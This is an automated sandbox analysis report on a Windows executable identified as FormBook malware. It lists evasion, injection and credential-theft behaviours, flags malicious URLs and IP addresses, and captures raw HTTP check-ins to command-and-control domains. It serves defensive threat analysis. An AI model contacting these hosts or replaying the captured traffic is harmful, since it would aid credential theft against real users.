Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hh01FRs81x.exe

Overview

General Information

Sample name:hh01FRs81x.exe
renamed because original name is a hash value
Original sample name:e1ac8636bad99361fb9c659acdbfcf925147d60655e0c7ede10c5d6f6f944678.exe
Analysis ID:1634560
MD5:353ca51dac0dfc8e05877f1ba27e0b5a
SHA1:b3aee14dd4f0e680cac74309ccdd8faa63c17e95
SHA256:e1ac8636bad99361fb9c659acdbfcf925147d60655e0c7ede10c5d6f6f944678
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • hh01FRs81x.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\hh01FRs81x.exe" MD5: 353CA51DAC0DFC8E05877F1BA27E0B5A)
    • hh01FRs81x.exe (PID: 5504 cmdline: "C:\Users\user\Desktop\hh01FRs81x.exe" MD5: 353CA51DAC0DFC8E05877F1BA27E0B5A)
    • hh01FRs81x.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\hh01FRs81x.exe" MD5: 353CA51DAC0DFC8E05877F1BA27E0B5A)
      • Gm9uUaV91ycxNY3GPL6q.exe (PID: 4444 cmdline: "C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Vgp8qq3XQ846.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • rekeywiz.exe (PID: 5976 cmdline: "C:\Windows\SysWOW64\rekeywiz.exe" MD5: 89AF1348B5D168DE820BD37C3A263D85)
          • Gm9uUaV91ycxNY3GPL6q.exe (PID: 5744 cmdline: "C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\JtZgzvJRXBco.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 2944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.hh01FRs81x.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.hh01FRs81x.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T01:29:45.962600+010028554651A Network Trojan was detected192.168.2.949696172.67.200.14880TCP
                2025-03-11T01:30:09.601137+010028554651A Network Trojan was detected192.168.2.949701144.76.229.20380TCP
                2025-03-11T01:30:23.119176+010028554651A Network Trojan was detected192.168.2.949705194.58.112.17480TCP
                2025-03-11T01:30:37.247539+010028554651A Network Trojan was detected192.168.2.94970947.83.1.9080TCP
                2025-03-11T01:30:50.632187+010028554651A Network Trojan was detected192.168.2.949713188.114.97.380TCP
                2025-03-11T01:31:04.395643+010028554651A Network Trojan was detected192.168.2.949717188.114.97.380TCP
                2025-03-11T01:31:17.798275+010028554651A Network Trojan was detected192.168.2.94972181.88.63.4680TCP
                2025-03-11T01:31:31.072789+010028554651A Network Trojan was detected192.168.2.94972566.29.133.19980TCP
                2025-03-11T01:31:52.283702+010028554651A Network Trojan was detected192.168.2.94972913.248.169.4880TCP
                2025-03-11T01:32:05.509896+010028554651A Network Trojan was detected192.168.2.949733199.59.243.16080TCP
                2025-03-11T01:32:18.935907+010028554651A Network Trojan was detected192.168.2.949737199.115.118.780TCP
                2025-03-11T01:32:32.265313+010028554651A Network Trojan was detected192.168.2.949741104.21.96.180TCP
                2025-03-11T01:32:45.657966+010028554651A Network Trojan was detected192.168.2.949745217.160.0.2480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T01:30:01.716520+010028554641A Network Trojan was detected192.168.2.949698144.76.229.20380TCP
                2025-03-11T01:30:04.332155+010028554641A Network Trojan was detected192.168.2.949699144.76.229.20380TCP
                2025-03-11T01:30:06.917707+010028554641A Network Trojan was detected192.168.2.949700144.76.229.20380TCP
                2025-03-11T01:30:15.437715+010028554641A Network Trojan was detected192.168.2.949702194.58.112.17480TCP
                2025-03-11T01:30:17.997923+010028554641A Network Trojan was detected192.168.2.949703194.58.112.17480TCP
                2025-03-11T01:30:20.540639+010028554641A Network Trojan was detected192.168.2.949704194.58.112.17480TCP
                2025-03-11T01:30:29.674168+010028554641A Network Trojan was detected192.168.2.94970647.83.1.9080TCP
                2025-03-11T01:30:32.222373+010028554641A Network Trojan was detected192.168.2.94970747.83.1.9080TCP
                2025-03-11T01:30:34.767972+010028554641A Network Trojan was detected192.168.2.94970847.83.1.9080TCP
                2025-03-11T01:30:42.944806+010028554641A Network Trojan was detected192.168.2.949710188.114.97.380TCP
                2025-03-11T01:30:45.522957+010028554641A Network Trojan was detected192.168.2.949711188.114.97.380TCP
                2025-03-11T01:30:48.079564+010028554641A Network Trojan was detected192.168.2.949712188.114.97.380TCP
                2025-03-11T01:30:56.624094+010028554641A Network Trojan was detected192.168.2.949714188.114.97.380TCP
                2025-03-11T01:30:59.151387+010028554641A Network Trojan was detected192.168.2.949715188.114.97.380TCP
                2025-03-11T01:31:01.692325+010028554641A Network Trojan was detected192.168.2.949716188.114.97.380TCP
                2025-03-11T01:31:10.151175+010028554641A Network Trojan was detected192.168.2.94971881.88.63.4680TCP
                2025-03-11T01:31:12.691785+010028554641A Network Trojan was detected192.168.2.94971981.88.63.4680TCP
                2025-03-11T01:31:15.258376+010028554641A Network Trojan was detected192.168.2.94972081.88.63.4680TCP
                2025-03-11T01:31:23.453799+010028554641A Network Trojan was detected192.168.2.94972266.29.133.19980TCP
                2025-03-11T01:31:26.000114+010028554641A Network Trojan was detected192.168.2.94972366.29.133.19980TCP
                2025-03-11T01:31:28.523022+010028554641A Network Trojan was detected192.168.2.94972466.29.133.19980TCP
                2025-03-11T01:31:44.641578+010028554641A Network Trojan was detected192.168.2.94972613.248.169.4880TCP
                2025-03-11T01:31:47.224359+010028554641A Network Trojan was detected192.168.2.94972713.248.169.4880TCP
                2025-03-11T01:31:50.802158+010028554641A Network Trojan was detected192.168.2.94972813.248.169.4880TCP
                2025-03-11T01:31:57.846206+010028554641A Network Trojan was detected192.168.2.949730199.59.243.16080TCP
                2025-03-11T01:32:00.396856+010028554641A Network Trojan was detected192.168.2.949731199.59.243.16080TCP
                2025-03-11T01:32:02.936110+010028554641A Network Trojan was detected192.168.2.949732199.59.243.16080TCP
                2025-03-11T01:32:11.263772+010028554641A Network Trojan was detected192.168.2.949734199.115.118.780TCP
                2025-03-11T01:32:13.854201+010028554641A Network Trojan was detected192.168.2.949735199.115.118.780TCP
                2025-03-11T01:32:16.391177+010028554641A Network Trojan was detected192.168.2.949736199.115.118.780TCP
                2025-03-11T01:32:24.580161+010028554641A Network Trojan was detected192.168.2.949738104.21.96.180TCP
                2025-03-11T01:32:27.133000+010028554641A Network Trojan was detected192.168.2.949739104.21.96.180TCP
                2025-03-11T01:32:29.695994+010028554641A Network Trojan was detected192.168.2.949740104.21.96.180TCP
                2025-03-11T01:32:37.968721+010028554641A Network Trojan was detected192.168.2.949742217.160.0.2480TCP
                2025-03-11T01:32:40.541492+010028554641A Network Trojan was detected192.168.2.949743217.160.0.2480TCP
                2025-03-11T01:32:43.098948+010028554641A Network Trojan was detected192.168.2.949744217.160.0.2480TCP
                2025-03-11T01:32:51.202591+010028554641A Network Trojan was detected192.168.2.94974684.32.84.3280TCP
                2025-03-11T01:32:53.762242+010028554641A Network Trojan was detected192.168.2.94974784.32.84.3280TCP
                2025-03-11T01:32:56.892228+010028554641A Network Trojan was detected192.168.2.94974884.32.84.3280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.031234990.xyz/ke4e/Avira URL Cloud: Label: malware
                Source: http://www.manicure-nano.sbs/xe9a/Avira URL Cloud: Label: malware
                Source: http://www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLHAvira URL Cloud: Label: malware
                Source: http://www.manicure-nano.sbs/xe9a/?R4lxS2-P=Js9MLFVrvPDnd5+ni8ZygkxzaO0VIjRaNA+bq5u28njuOQOlbcuyRwAKZGYdeAPN2eXOdFkY4BsziTYcIA5zXcFLq9FbxaZYgBR+Fjebj5zHj3TvFQ==&LL=4FHLHAvira URL Cloud: Label: malware
                Source: http://www.trustai.chatAvira URL Cloud: Label: malware
                Source: http://www.serenityos.dev/dntg/Avira URL Cloud: Label: malware
                Source: http://www.maplez.online/d762/?LL=4FHLH&R4lxS2-P=hkRV+G/BOAk0D4BpTlV9Zaghp2TJbbj6KayKBaJB/kftfSF33fCtFyI7KdPoKzo9B/N+2BkDoP6YUI3kBM+ouKXf0xQElRNMHavlkiEYI/vjprTQcw==Avira URL Cloud: Label: malware
                Source: http://www.trustai.chat/kv4n/Avira URL Cloud: Label: malware
                Source: http://www.031234990.xyz/ke4e/?R4lxS2-P=Dd6dmEnwJGfYT0rNhn1NB1b+I6SwAwN4NY0E8cNSqGHJ6me6c02fUEuS6yOsUhW9B84bafP+dgEyFYbDj8j1ZpOCE8bflsPqzLf7RSS1Hu8QkzcZhw==&LL=4FHLHAvira URL Cloud: Label: malware
                Source: http://www.maplez.online/d762/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: hh01FRs81x.exeReversingLabs: Detection: 71%
                Source: hh01FRs81x.exeVirustotal: Detection: 70%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: hh01FRs81x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hh01FRs81x.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: IfzV.pdb source: hh01FRs81x.exe
                Source: Binary string: rekeywiz.pdb source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IfzV.pdbSHA256u source: hh01FRs81x.exe
                Source: Binary string: wntdll.pdb source: hh01FRs81x.exe, hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rekeywiz.pdbGCTL source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335000308.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388624371.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006EC780 FindFirstFileW,FindNextFileW,FindClose,7_2_006EC780
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 4x nop then xor eax, eax7_2_006D9FF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 4x nop then pop edi7_2_006DE313

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49704 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49720 -> 81.88.63.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49711 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49696 -> 172.67.200.148:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49702 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49747 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49709 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49705 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49714 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49710 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49706 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49731 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49699 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49742 -> 217.160.0.24:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49745 -> 217.160.0.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49748 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49700 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49718 -> 81.88.63.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49736 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49733 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49740 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49727 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49716 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49726 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49703 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49698 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49728 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49725 -> 66.29.133.199:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49701 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49734 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49713 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49743 -> 217.160.0.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49712 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49721 -> 81.88.63.46:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49729 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49744 -> 217.160.0.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49739 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49723 -> 66.29.133.199:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49737 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49708 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49738 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49724 -> 66.29.133.199:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49715 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49722 -> 66.29.133.199:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49730 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49717 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49707 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49735 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49732 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49741 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49719 -> 81.88.63.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49746 -> 84.32.84.32:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.031234990.xyz
                Source: DNS query: www.bitcoinescort.xyz
                Source: DNS query: www.chivor.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /0dsh/?R4lxS2-P=+zxjW1iBImYrmxMKsluZzWs779EkbColwQIGqFJVLL47+971w1Z0xPL+QWMSocRfBt2JXyMCIRyNiq0Ag6oka1CFR1z8G0+zZkiCTBSFiWwVsQ1sIA==&LL=4FHLH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.rtphajar4d.artUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SM-G730A Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ke4e/?R4lxS2-P=Dd6dmEnwJGfYT0rNhn1NB1b+I6SwAwN4NY0E8cNSqGHJ6me6c02fUEuS6yOsUhW9B84bafP+dgEyFYbDj8j1ZpOCE8bflsPqzLf7RSS1Hu8QkzcZhw==&LL=4FHLH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.031234990.xyzUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SM-G730A Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /d762/?LL=4FHLH&R4lxS2-P=hkRV+G/BOAk0D4BpTlV9Zaghp2TJbbj6KayKBaJB/kftfSF33fCtFyI7KdPoKzo9B/N+2BkDoP6YUI3kBM+ouKXf0xQElRNMHavlkiEYI/vjprTQcw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.maplez.onlineUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SM-G730A Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /m8lo/?R4lxS2-P=m1vFK/mlzoHXB5iIT/4pV5eXQw+5dQVbig4BjA8M6e3iMb4NR2P77o5JKU5yngt7Hnt/Z6ee0Wr1g/mbOq1KwocZ/9IKplDkpi2FmpJmV96XbJtzzA==&LL=4FHLH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.fjlgyc.infoUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SM-G730A Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
